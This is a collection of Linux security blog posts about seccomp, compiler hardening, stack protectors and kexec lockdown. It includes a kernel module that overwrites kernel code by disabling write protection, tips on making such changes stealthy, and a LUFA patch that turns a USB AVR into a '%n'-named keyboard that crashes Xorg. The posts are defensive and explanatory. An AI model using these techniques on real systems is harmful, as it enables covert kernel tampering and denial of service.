codeblog code is freedom — patching my itch


evolution of seccomp

Filed under: Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 10:01 am

I’m excited to see other people thinking about userspace-to-kernel attack surface reduction ideas. Theo de Raadt recently published slides describing Pledge. This uses the same ideas that seccomp implements, but with less granularity. While seccomp works at the individual syscall level and in addition to killing processes, it allows for signaling, tracing, and errno spoofing. As de Raadt mentions, Pledge could be implemented with seccomp very easily: libseccomp would just categorize syscalls.

I don’t really understand the presentation’s mention of “Optional Security”, though. Pledge, like seccomp, is an opt-in feature. Nothing in the kernel refuses to run “unpledged” programs. I assume his point was that when it gets ubiquitously built into programs (like stack protector), it’s effectively not optional (which is alluded to later as “comprehensive applicability ~= mandatory mitigation”). Regardless, this sensible (though optional) design gets me back to his slide on seccomp, which seems to have a number of misunderstandings:

  • A Turing complete eBPF program watches your program Strictly speaking, seccomp is implemented using a subset of BPF, not eBPF. And since BPF (and eBPF) programs are guaranteed to halt, it makes seccomp filters not Turing complete.
  • Who watches the watcher? I don’t even understand this. It’s in the kernel. The kernel watches your program. Just like always. If this is a question of BPF program verification, there is literally a program verifier that checks various properties of the BPF program.
  • seccomp program is stored elsewhere This, with the next statement, is just totally misunderstood. Programs using seccomp define their program in their own code. It’s used the same way as the Pledge examples are shown doing.
  • Easy to get desyncronized either program is updated As above, this just isn’t the case. The only place where this might be true is when using seccomp on programs that were not written natively with seccomp. In that case, yes, desync is possible. But that’s one of the advantages of seccomp’s design: a program launcher (like minijail or systemd) can declare a seccomp filter for a program that hasn’t yet been ported to use one natively.
  • eBPF watcher has no real idea what the program under observation is doing… I don’t understand this statement. I don’t see how Pledge would “have a real idea” either: they’re both doing filtering. If we get AI out of our syscall filters, we’re in serious trouble. :)

OpenBSD has some interesting advantages in the syscall filtering department, especially around sockets. Right now, it’s hard for Linux syscall filtering to understand why a given socket is being used. Something like SOCK_DNS seems like it could be quite handy.

Another nice feature of Pledge is the path whitelist feature. As it’s still under development, I hope they expand this to include more things than just paths. Argument inspection is a weak point for seccomp, but under Linux, most of the arguments are ultimately exposed to the LSM layer. Last year I experimented with creating a “seccomp LSM” for path matching where programs could declare whitelists, similar to standard LSMs.

So, yes, Linux “could match this API on seccomp”. It’d just take some extensions to libseccomp to implement pledge(), as I described at the top. With OpenBSD doing a bunch of analysis work on common programs, it’d be excellent to see this usable on Linux too. So far on Linux, only a few programs (e.g. Chrome, vsftpd) have bothered to do this using seccomp, and it could be argued that this is ultimately due to how fine grained it is.

© 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


3D printing Poe

Filed under: Blogging,Debian,Security,Ubuntu — kees @ 3:08 pm

I helped print this statue of Edgar Allan Poe, through “We the Builders“, who coordinate large-scale crowd-sourced 3D print jobs:

Poe's Face

You can see one of my parts here on top, with “-Kees” on the piece with the funky hair strand:

Poe's Hair

The MakerWare I run on Ubuntu works well. I wish they were correctly signing their repositories. Even if I use non-SSL to fetch their key, as their Ubuntu/Debian instructions recommend, it still doesn’t match the packages:

W: GPG error: trusty Release: The following signatures were invalid: BADSIG 3D019B838FB1487F MakerBot Industries dev team <>

And it’s not just my APT configuration:

$ wget
$ wget
$ gpg --verify Release.gpg Release
gpg: Signature made Wed 11 Mar 2015 12:43:07 PM PDT using RSA key ID 8FB1487F
gpg: requesting key 8FB1487F from hkp server
gpg: key 8FB1487F: public key "MakerBot Industries LLC (Software development team) <>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)
gpg: BAD signature from "MakerBot Industries LLC (Software development team) <>"
$ grep ^Date Release
Date: Tue, 09 Jun 2015 19:41:02 UTC

Looks like they’re updating their Release file without updating the signature file. (The signature is from March, but the Release file is from June. Oops!)

© 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


barcode consolidation

Filed under: Blogging,Debian,General,Security,Ubuntu — kees @ 5:33 pm

I had a mess of loyalty cards filling my wallet. It kind of looked like this:

Loyalty cards, from Flickr, joelogon

They took up too much room, and I used them infrequently. The only thing of value on them are the barcodes they carry that identify my account with whatever organization they’re tied to. Other folks have talked about doing consolidation in various ways like just scanning images of the cards and printing them all together. There was a site where you typed in card details and they generated barcodes for you, too. I didn’t want to hand my identifiers to a third party, and image scanning wasn’t flexible enough. I wanted to actually have the raw numbers, so I ended up using barcode. I didn’t use the Debian nor Ubuntu package, though, since it lacked SVG support, which was added in the latest (cough March 2013) version.

I used the Android Barcode Scanner app, and just saved all the barcodes and their encoding details to a text file, noting which was which. For example:

Albertsons "035576322436","UPC_A"
Multnomah County Library "01237035218482","CODABAR"
Supportland "!0000005341632030145420","CODE_128"

I measured the barcode area, since some scanners can’t handle their expected barcodes being resized, (that’s another project: find out which CAN handle it), and then spat out SVG files. I compared the results to my actual cards, since some times encodings have different options (like dropping checksum characters, “-c” below):

barcode-svg -S -u in -g 1.5x0.5 -e upc-a      -b '035576322436' > albertsons.svg
barcode-svg -S -u in -g   2x0.5 -e codabar -c -b '01237035218482' > library.svg
barcode-svg -S -u cm -g 4.5x1   -e code128    -b '!0000005341632030145420' > supportland.svg

With Inkscape, I opened them all and organized them onto a wallet-card-sized area, printed it, and laminated it. Now my wallet is 7 cards lighter. More room for HID cards or other stuff:

Emergency Pick Card

© 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


glibc select weakness fixed

Filed under: Blogging,Chrome OS,Debian,General,Security,Ubuntu,Ubuntu-Server — kees @ 11:21 am

In 2009, I reported this bug to glibc, describing the problem that exists when a program is using select, and has its open file descriptor resource limit raised above 1024 (FD_SETSIZE). If a network daemon starts using the FD_SET/FD_CLR glibc macros on fdset variables for descriptors larger than 1024, glibc will happily write beyond the end of the fdset variable, producing a buffer overflow condition. (This problem had existed since the introduction of the macros, so, for decades? I figured it was long over-due to have a report opened about it.)

At the time, I was told this wasn’t going to be fixed and “every program using [select] must be considered buggy.” 2 years later still more people kept asking for this feature and continued to be told “no”.

But, as it turns out, a few months later after the most recent “no”, it got silently fixed anyway, with the bug left open as “Won’t Fix”! I’m glad Florian did some house-cleaning on the glibc bug tracker, since I’d otherwise never have noticed that this protection had been added to the ever-growing list of -D_FORTIFY_SOURCE=2 protections.

I’ll still recommend everyone use poll instead of select, but now I won’t be so worried when I see requests to raise the open descriptor limit above 1024.

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


Linux Security Summit 2014

Filed under: Blogging,Chrome OS,Debian,General,Security,Ubuntu,Ubuntu-Server — kees @ 10:31 am

The Linux Security Summit is happening in Chicago August 18th and 19th, just before LinuxCon. Send us some presentation and topic proposals, and join the conversation with other like-minded people. :)

I’d love to see what people have been working on, and what they’d like to work on. Our general topics will hopefully include:

  • System hardening
  • Access control
  • Cryptography
  • Integrity control
  • Hardware security
  • Networking
  • Storage
  • Virtualization
  • Desktop
  • Tools
  • Management
  • Case studies
  • Emerging technologies, threats & techniques

The Call For Participation closes June 6th, so you’ve got about a month, but earlier is better.

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


compiler hardening in Ubuntu and Debian

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 8:42 am

Back in 2006, the compiler in Ubuntu was patched to enable most build-time security-hardening features (relro, stack protector, fortify source). I wasn’t able to convince Debian to do the same, so Debian went the route of other distributions, adding security hardening flags during package builds only. I remain disappointed in this approach, because it means that someone who builds software without using the packaging tools on a non-Ubuntu system won’t get those hardening features. Think of a sysadmin trying the latest nginx, or a vendor like Valve building games for distribution. On Ubuntu, when you do that “./configure && make” you’ll get the features automatically.

Debian, at the time, didn’t have a good way forward even for package builds since it lacked a concept of “global package build flags”. Happily, a solution (via dh) was developed about 2 years ago, and Debian package maintainers have been working to adopt it ever since.

So, while I don’t think any distro can match Ubuntu’s method of security hardening compiler defaults, it is valuable to see the results of global package build flags in Debian on the package archive. I’ve had an on-going graph of the state of build hardening on both Ubuntu and Debian for a while, but only recently did I put together a comparison of a default install. Very few people have all the packages in the archive installed, so it’s a bit silly to only look at the archive statistics. But let’s start there, just to describe what’s being measured.

Here’s today’s snapshot of Ubuntu’s development archive for the past year (you can see development “opening” after a release every 6 months with an influx of new packages):

Here’s today’s snapshot of Debian’s unstable archive for the past year (at the start of May you can see the archive “unfreezing” after the Wheezy release; the gaps were my analysis tool failing):

Ubuntu’s lines are relatively flat because everything that can be built with hardening already is. Debian’s graph is on a slow upward trend as more packages get migrated to dh to gain knowledge of the global flags.

Each line in the graphs represents the count of source packages that contain binary packages that have at least 1 “hit” for a given category. “ELF” is just that: a source package that ultimately produces at least 1 binary package with at least 1 ELF binary in it (i.e. produces a compiled output). The “Read-only Relocations” (“relro”) hardening feature is almost always done for an ELF, excepting uncommon situations. As a result, the count of ELF and relro are close on Ubuntu. In fact, examining relro is a good indication of whether or not a source package got built with hardening of any kind. So, in Ubuntu, 91.5% of the archive is built with hardening, with Debian at 55.2%.

The “stack protector” and “fortify source” features depend on characteristics of the source itself, and may not always be present in package’s binaries even when hardening is enabled for the build (e.g. no functions got selected for stack protection, or no fortified glibc functions were used). Really these lines mostly indicate the count of packages that have a sufficiently high level of complexity that would trigger such protections.

The “PIE” and “immediate binding” (“bind_now”) features are specifically enabled by a package maintainer. PIE can have a noticeable performance impact on CPU-register-starved architectures like i386 (ia32), so it is neither patched on in Ubuntu, nor part of the default flags in Debian. (And bind_now doesn’t make much sense without PIE, so they usually go together.) It’s worth noting, however, that it probably should be the default on amd64 (x86_64), which has plenty of available registers.

Here is a comparison of default installed packages between the most recent stable releases of Ubuntu (13.10) and Debian (Wheezy). It’s clear that what the average user gets with a default fresh install is better than what the archive-to-archive comparison shows. Debian’s showing is better (74% built with hardening), though it is still clearly lagging behind Ubuntu (99%):

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License



Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 2:28 pm

There will be a new option in gcc 4.9 named “-fstack-protector-strong“, which offers an improved version of “-fstack-protector” without going all the way to “-fstack-protector-all“. The stack protector feature itself adds a known canary to the stack during function preamble, and checks it when the function returns. If it changed, there was a stack overflow, and the program aborts. This is fine, but figuring out when to include it is the reason behind the various options.

Since traditionally stack overflows happen with string-based manipulations, the default (-fstack-protector), only includes the canary code when a function defines an 8 (--param=ssp-buffer-size=N, N=8 by default) or more byte local character array. This means just a few functions get the checking, but they’re probably the most likely to need it, so it’s an okay balance. Various distributions ended up lowering their default --param=ssp-buffer-size option down to 4, since there were still cases of functions that should have been protected but the conservative gcc upstream default of 8 wasn’t covering them.

However, even with the increased function coverage, there are rare cases when a stack overflow happens on other kinds of stack variables. To handle this more paranoid concern, -fstack-protector-all was defined to add the canary to all functions. This results in substantial use of stack space for saving the canary on deep stack users, and measurable (though surprisingly still relatively low) performance hit due to all the saving/checking. For a long time, Chrome OS used this, since we’re paranoid. :)

In the interest of gaining back some of the lost performance and not hitting our Chrome OS build images with such a giant stack-protector hammer, Han Shen from the Chrome OS compiler team created the new option -fstack-protector-strong, which enables the canary in many more conditions:

  • local variable’s address used as part of the right hand side of an assignment or function argument
  • local variable is an array (or union containing an array), regardless of array type or length
  • uses register local variables

This meant we were covering all the more paranoid conditions that might lead to a stack overflow. Chrome OS has been using this option instead of -fstack-protector-all for about 10 months now.

As a quick demonstration of the options, you can see this example program under various conditions. It tries to show off an example of shoving serialized data into a non-character variable, like might happen in some network address manipulations or streaming data parsing. Since I’m using memcpy here for clarity, the builds will need to turn off FORTIFY_SOURCE, which would also notice the overflow.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct no_chars {
    unsigned int len;
    unsigned int data;

int main(int argc, char * argv[])
    struct no_chars info = { };

    if (argc < 3) {
        fprintf(stderr, "Usage: %s LENGTH DATA...\n", argv[0]);
        return 1;

    info.len = atoi(argv[1]);
    memcpy(&, argv[2], info.len);

    return 0;

Built with everything disabled, this faults trying to return to an invalid VMA:

    $ gcc -Wall -O2 -U_FORTIFY_SOURCE -fno-stack-protector /tmp/boom.c -o /tmp/boom
    Segmentation fault (core dumped)

Built with FORTIFY_SOURCE enabled, we see the expected catch of the overflow in memcpy:

    $ gcc -Wall -O2 -D_FORTIFY_SOURCE=2 -fno-stack-protector /tmp/boom.c -o /tmp/boom
    *** buffer overflow detected ***: /tmp/boom terminated

So, we’ll leave FORTIFY_SOURCE disabled for our comparisons. With pre-4.9 gcc, we can see that -fstack-protector does not get triggered to protect this function:

    $ gcc -Wall -O2 -U_FORTIFY_SOURCE -fstack-protector /tmp/boom.c -o /tmp/boom
    Segmentation fault (core dumped)

However, using -fstack-protector-all does trigger the protection, as expected:

    $ gcc -Wall -O2 -U_FORTIFY_SOURCE -fstack-protector-all /tmp/boom.c -o /tmp/boom
    *** stack smashing detected ***: /tmp/boom terminated
    Aborted (core dumped)

And finally, using the gcc snapshot of 4.9, here is -fstack-protector-strong doing its job:

    $ /usr/lib/gcc-snapshot/bin/gcc -Wall -O2 -U_FORTIFY_SOURCE -fstack-protector-strong /tmp/boom.c -o /tmp/boom
    *** stack smashing detected ***: /tmp/boom terminated
    Aborted (core dumped)

For Linux 3.14, I’ve added support for -fstack-protector-strong via the new CONFIG_CC_STACKPROTECTOR_STRONG option. The old CONFIG_CC_STACKPROTECTOR will be available as CONFIG_CC_STACKPROTECTOR_REGULAR. When comparing the results on builds via size and objdump -d analysis, here’s what I found with gcc 4.9:

A normal x86_64 “defconfig” build, without stack protector had a kernel text size of 11430641 bytes with 36110 function bodies. Adding CONFIG_CC_STACKPROTECTOR_REGULAR increased the kernel text size to 11468490 (a +0.33% change), with 1015 of 36110 functions stack-protected (2.81%). Using CONFIG_CC_STACKPROTECTOR_STRONG increased the kernel text size to 11692790 (+2.24%), with 7401 of 36110 functions stack-protected (20.5%). And 20% is a far-cry from 100% if support for -fstack-protector-all was added back to the kernel.

The next bit of work will be figuring out the best way to detect the version of gcc in use when doing Debian package builds, and using -fstack-protector-strong instead of -fstack-protector. For Ubuntu, it’s much simpler because it’ll just be the compiler default.

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


live patching the kernel

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 3:40 pm

A nice set of recent posts have done a great job detailing the remaining ways that a root user can get at kernel memory. Part of this is driven by the ideas behind UEFI Secure Boot, but they come from the same goal: making sure that the root user cannot directly subvert the running kernel. My perspective on this is toward making sure that an attacker who has gained access and then gained root privileges can’t continue to elevate their access and install invisible kernel rootkits.

An outline for possible attack vectors is spelled out by Matthew Gerrett’s continuing “useful kernel lockdown” patch series. The set of attacks was examined by Tyler Borland in “Bypassing modules_disabled security”. His post describes each vector in detail, and he ultimately chooses MSR writing as the way to write kernel memory (and shows an example of how to re-enable module loading). One thing not mentioned is that many distros have MSR access as a module, and it’s rarely loaded. If modules_disabled is already set, an attacker won’t be able to load the MSR module to begin with. However, the other general-purpose vector, kexec, is still available. To prove out this method, Matthew wrote a proof-of-concept for changing kernel memory via kexec.

Chrome OS is several steps ahead here, since it has hibernation disabled, MSR writing disabled, kexec disabled, modules verified, root filesystem read-only and verified, kernel verified, and firmware verified. But since not all my machines are Chrome OS, I wanted to look at some additional protections against kexec on general-purpose distro kernels that have CONFIG_KEXEC enabled, especially those without UEFI Secure Boot and Matthew’s lockdown patch series.

My goal was to disable kexec without needing to rebuild my entire kernel. For future kernels, I have proposed adding /proc/sys/kernel/kexec_disabled, a partner to the existing modules_disabled, that will one-way toggle kexec off. For existing kernels, things got more ugly.

What options do I have for patching a running kernel?

First I looked back at what I’d done in the past with fixing vulnerabilities with systemtap. This ends up being a rather heavy-duty way to go about things, since you need all the distro kernel debug symbols, etc. It does work, but has a significant problem: since it uses kprobes, a root user can just turn off the probes, reverting the changes. So that’s not going to work.

Next I looked at ksplice. The original upstream has gone away, but there is still some work being done by Jiri Slaby. However, even with his updates which fixed various build problems, there were still more, even when building a 3.2 kernel (Ubuntu 12.04 LTS). So that’s out too, which is too bad, since ksplice does exactly what I want: modifies the running kernel’s functions via a module.

So, finally, I decided to just do it by hand, and wrote a friendly kernel rootkit. Instead of dealing with flipping page table permissions on the normally-unwritable kernel code memory, I borrowed from PaX’s KERNEXEC feature, and just turn off write protect checking on the CPU briefly to make the changes. The return values for functions on x86_64 are stored in RAX, so I just need to stuff the kexec_load syscall with “mov -1, %rax; ret” (-1 is EPERM):

#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt

#include <linux/init.h>
#include <linux/module.h>
#include <linux/slab.h>

static unsigned long long_target;
static char *target;
module_param_named(syscall, long_target, ulong, 0644);
MODULE_PARM_DESC(syscall, "Address of syscall");

/* mov $-1, %rax; ret */
unsigned const char bytes[] = { 0x48, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff,
                                0xc3 };
unsigned char *orig;

/* Borrowed from PaX KERNEXEC */
static inline void disable_wp(void)
        unsigned long cr0;

        cr0 = read_cr0();
        cr0 &= ~X86_CR0_WP;

static inline void enable_wp(void)
        unsigned long cr0;

        cr0 = read_cr0();
        cr0 |= X86_CR0_WP;

static int __init syscall_eperm_init(void)
        int i;
        target = (char *)long_target;

        if (target == NULL)
                return -EINVAL;

        /* save original */
        orig = kmalloc(sizeof(bytes), GFP_KERNEL);
        if (!orig)
                return -ENOMEM;
        for (i = 0; i < sizeof(bytes); i++) {
                orig[i] = target[i];

        pr_info("writing %lu bytes at %p\n", sizeof(bytes), target);

        for (i = 0; i < sizeof(bytes); i++) {
                target[i] = bytes[i];

        return 0;

static void __exit syscall_eperm_exit(void)
        int i;

        pr_info("restoring %lu bytes at %p\n", sizeof(bytes), target);

        for (i = 0; i < sizeof(bytes); i++) {
                target[i] = orig[i];


MODULE_AUTHOR("Kees Cook <>");
MODULE_DESCRIPTION("makes target syscall always return EPERM");

If I didn’t want to leave an obvious indication that the kernel had been manipulated, the module could be changed to:

  • not announce what it’s doing
  • remove the exit route to not restore the changes on module unload
  • error out at the end of the init function instead of staying resident

And with this in place, it’s just a matter of loading it with the address of sys_kexec_load (found via /proc/kallsyms) before I disable module loading via modprobe. Here’s my upstart script:

# modules-disable - disable modules after rc scripts are done
description "disable loading modules"

start on stopped module-init-tools and stopped rc

        cd /root/modules/syscall_eperm
        make clean
        insmod ./syscall_eperm.ko \
                syscall=0x$(egrep ' T sys_kexec_load$' /proc/kallsyms | cut -d" " -f1)
        modprobe disable
end script

And now I’m safe from kexec before I have a kernel that contains /proc/sys/kernel/kexec_disabled.

© 2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


TPM providing /dev/hwrng

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 9:10 am

A while ago, I added support for the TPM’s pRNG to the rng-tools package in Ubuntu. Since then, Kent Yoder added TPM support directly into the kernel’s /dev/hwrng device. This means there’s no need to carry the patch in rng-tools any more, since I can use /dev/hwrng directly now:

# modprobe tpm-rng
# echo tpm-rng >> /etc/modules
# grep -v ^# /etc/default/rng-tools
# service rng-tools restart

And as before, once it’s been running a while (or you send SIGUSR1 to rngd), you can see reporting in syslog:

# pkill -USR1 rngd
# tail -n 15 /var/log/syslog
Aug 13 09:51:01 linux rngd[39114]: stats: bits received from HRNG source: 260064
Aug 13 09:51:01 linux rngd[39114]: stats: bits sent to kernel pool: 216384
Aug 13 09:51:01 linux rngd[39114]: stats: entropy added to kernel pool: 216384
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2 successes: 13
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2 failures: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Monobit: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Poker: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Runs: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Long run: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Continuous run: 0
Aug 13 09:51:01 linux rngd[39114]: stats: HRNG source speed: (min=10.433; avg=10.442; max=10.454)Kibits/s
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS tests speed: (min=73.360; avg=75.504; max=86.305)Mibits/s
Aug 13 09:51:01 linux rngd[39114]: stats: Lowest ready-buffers level: 2
Aug 13 09:51:01 linux rngd[39114]: stats: Entropy starvations: 0
Aug 13 09:51:01 linux rngd[39114]: stats: Time spent starving for entropy: (min=0; avg=0.000; max=0)us

I’m pondering getting this running in Chrome OS too, but I want to make sure it doesn’t suck too much battery.

© 2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


facedancer built

Filed under: Blogging,Chrome OS,Embedded,Security,Ubuntu,Ubuntu-Server — kees @ 2:39 pm

I finally had the time to put together the facedancer11 that Travis Goodspeed was so kind to give me. I had ordered all the parts some time ago, but had been dreading the careful surface-mount soldering work it was going to require. As it turned out, I’m not half bad at it — everything seems to have worked the first time through. I did, however, fail to order 33ohm 0603 resistors, so I have some temporary ones in use until I can replace them.

My facedancer

This device allows the HOST side computer to drive USB protocol communication at the packet level, with the TARGET seeing a USB device on the other end. No more needing to write careful embedded code while breaking USB stacks: the fake USB device can be controlled with Python.

This means I’m able to start some more serious fuzzing of the USB protocol layer. There is already code for emulating HID (Keyboard), Mass Storage, and now Firmware Updates. There’s probably tons to look at just in that. For some background on the fun to be had just with Mass Storage devices, see Goodspeed’s 23C9 presentation on it.

© 2013 – 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


clean module disabling

Filed under: Blogging,Chrome OS,Security,Ubuntu,Ubuntu-Server — kees @ 3:55 pm

I think I found a way to make disabling kernel module loading (via /proc/sys/kernel/modules_disabled) easier for server admins. Right now there’s kind of a weird problem on some distros where reading /etc/modules races with reading /etc/sysctl.{conf,d}. In these cases, you can’t just put “kernel.modules_disabled=1” in the latter since you might not have finished loading modules from /etc/modules.

Before now, on my own systems, I’d added the sysctl call to my /etc/rc.local, which seems like a hack — that file is related to neither sysctl nor modules and both subsystems have their own configuration files, but it does happen absolutely last.

Instead, I’ve now defined “disable” as a modprobe alias via /etc/modprobe.d/disable.conf:

# To disable module loading after boot, "modprobe disable" can be used to
# set the sysctl that controls module loading.
install disable /sbin/sysctl kernel.modules_disabled=1

And then in /etc/modules I can list all the modules I actually need, and then put “disable” on the last line. (Or, if I want to not remember the sysctl path, I can manually run “modprobe disable” to turn off modules at some later point.)

I think it’d be cool this this become an internal alias in upstream kmod.

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


product search in Ubuntu 12.10

Filed under: Blogging,Security,Ubuntu,Web — kees @ 3:18 pm

The EFF has already discussed the product search “feature” in Ubuntu 12.10′s Unity UI. Ways for disabling it are covered:

  • sudo apt-get remove unity-lens-shopping – it isn’t easy to generally blacklist a package, it might end up getting re-installed later, etc.
  • System Settings / Privacy / Search Results – the naming says nothing about it disabling product search results.
  • use a UI other than Unity – this is what I do.

Here’s another way, that overrides the URL used for the product searching (restart your session after making this change):

$ sudo -s
# echo 'OFFERS_URI="https://localhost:0/"' >> /etc/environment

Or, if you run an organization where you build devices that run Ubuntu, and want to snoop on all the things people type into their Unity search bar, just change that to a URL you control.

I’m astonished by Canonical’s blatant disregard for providing a way to opt-in to this gaping privacy hole. This is a dramatic case of “calling home”, and provides a large amount of information about the user, in real-time. Besides sending the content of their searches and the version of the software installed, it also sends every keystroke, which means in some weird cases, even passive observers can examine keystroke timing which has been shown to potentially leak what is being typed: - - [09/Nov/2012:14:29:41 -0800] "GET //v1/search?q=p HTTP/1.1" 404 522 "-" "Unity Shopping Lens 6.8.0" - - [09/Nov/2012:14:29:41 -0800] "GET //v1/search?q=pw HTTP/1.1" 404 521 "-" "Unity Shopping Lens 6.8.0" - - [09/Nov/2012:14:29:41 -0800] "GET //v1/search?q=pwn HTTP/1.1" 404 521 "-" "Unity Shopping Lens 6.8.0"

Ubuntu is a general-purpose OS, with Unity as its default interface. It is not a vendor-tied appliance nor a telephone company device, and Unity is not a browser (in fact, even in a browser there are visual indicators of where what you have typed will go).

Even if the default for this is enabled, there needs to be (likely at install-time) a page describing what to expect, and the system owner can choose “yes, search online” or “no thanks”. This behavior needs to be fixed in 13.04 and SRUed into 12.10. If there is no fast solution, then it just needs to be disabled by default until it has a sane notification flow.

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


Link restrictions released in Linux 3.6

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 12:59 pm

It’s been a very long time coming, but symlink and hardlink restrictions have finally landed in the mainline Linux kernel as of version 3.6. The protection is at least old enough to have a driver’s license in most US states, with some of the first discussions I could find dating from Aug 1996.

While this protection is old (to ancient) news for anyone running Chrome OS, Ubuntu, grsecurity, or OpenWall, I’m extremely excited that is can now benefit everyone running Linux. All the way from cloud monstrosities to cell phones, an entire class of vulnerability just goes away. Thanks to everyone that had a part in developing, testing, reviewing, and encouraging these changes over the years. It’s quite a relief to have it finally done. I hope I never have to include the year in my patch revision serial number again. :)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License



At the recent Ubuntu Developer Summit, I managed to convince a few people (after assurances that there would be no permanent damage) to plug a USB stick into their machines so we could watch Xorg crash and wedge their console. What was this evil thing, you ask? It was an AVR microprocessor connected to USB, acting as a USB HID Keyboard, with the product name set to “%n”.

Recently a Chrome OS developer discovered that renaming his Bluetooth Keyboard to “%n” would crash Xorg. The flaw was in the logging stack, triggering glibc to abort the process due to format string protections. At first glance, it looks like this isn’t a big deal since one would have to have already done a Bluetooth pairing with the keyboard, but it would be a problem for any input device, not just Bluetooth. I wanted to see this in action for a “normal” (USB) keyboard.

I borrowed a “Maximus” USB AVR from a friend, and then ultimately bought a Minimus. It will let you put anything you want on the USB bus.

I added a rule for it to udev:

SUBSYSTEM=="usb", ACTION=="add", ATTR{idVendor}=="03eb", ATTR{idProduct}=="*", GROUP="plugdev"

installed the AVR tools:

sudo apt-get install dfu-programmer gcc-avr avr-libc

and pulled down the excellent LUFA USB tree:

git clone git://

After applying a patch to the LUFA USB keyboard demo, I had my handy USB-AVR-as-Keyboard stick ready to crash Xorg:

-       .VendorID               = 0x03EB,
-       .ProductID              = 0x2042,
+       .VendorID               = 0x045e,
+       .ProductID              = 0x000b,
-       .UnicodeString          = L"LUFA Keyboard Demo"
+       .UnicodeString          = L"Keyboard (%n%n%n%n)"

In fact, it was so successfully that after I got the code right and programmed it, Xorg immediately crashed on my development machine. :)

make dfu

After a reboot, I switched it back to programming mode by pressing and holding the “H” button, press/releasing the “R” button, and releasing “H”.

The fix to Xorg is winding its way through upstream, and should land in your distros soon. In the meantime, you can disable your external USB ports, as Marc Deslauriers demonstrated for me:

echo "0" > /sys/bus/usb/devices/usb1/authorized
echo "0" > /sys/bus/usb/devices/usb1/authorized_default

Be careful of shared internal/external ports, and having two buses on one port, etc.

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


keeping your process unprivileged

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 1:17 pm

One of the prerequisites for seccomp filter is the new PR_SET_NO_NEW_PRIVS prctl from Andy Lutomirski.

If you’re not interested in digging into creating a seccomp filter for your program, but you know your program should be effectively a “leaf node” in the process tree, you can call PR_SET_NO_NEW_PRIVS (nnp) to make sure that the current process and its children can not gain new privileges (like through running a setuid binary). This produces some fun results, since things like the “ping” tool expect to gain enough privileges to open a raw socket. If you set nnp to “1″, suddenly that can’t happen any more.

Here’s a quick example that sets nnp, and tries to run the command line arguments:

#include <stdio.h>
#include <unistd.h>
#include <sys/prctl.h>
# define PR_SET_NO_NEW_PRIVS 38

int main(int argc, char * argv[])
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
                return 1;

        return execvp(argv[1], &argv[1]);

When it tries to run ping, the setuid-ness just gets ignored:

$ gcc -Wall nnp.c -o nnp
$ ./nnp ping -c1 localhost
ping: icmp open socket: Operation not permitted

So, if your program has all the privs its going to need, consider using nnp to keep it from being a potential gateway to more trouble. Hopefully we can ship something like this trivial nnp helper as part of coreutils or similar, like nohup, nice, etc.

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


seccomp filter now in Ubuntu

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 10:02 pm

With the generous help of the Ubuntu kernel team, Will Drewry’s seccomp filter code has landed in Ubuntu 12.04 LTS in time for Beta 2, and will be in Chrome OS shortly. Hopefully this will be in upstream soon, and filter (pun intended) to the rest of the distributions quickly.

One of the questions I’ve been asked by several people while they developed policy for earlier “mode 2″ seccomp implementations was “How do I figure out which syscalls my program is going to need?” To help answer this question, and to show a simple use of seccomp filter, I’ve written up a little tutorial that walks through several steps of building a seccomp filter. It includes a header file (“seccomp-bpf.h“) for implementing the filter, and a collection of other files used to assist in syscall discovery. It should be portable, so it can build even on systems that do not have seccomp available yet.

Read more in the seccomp filter tutorial. Enjoy!

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


use of ptrace

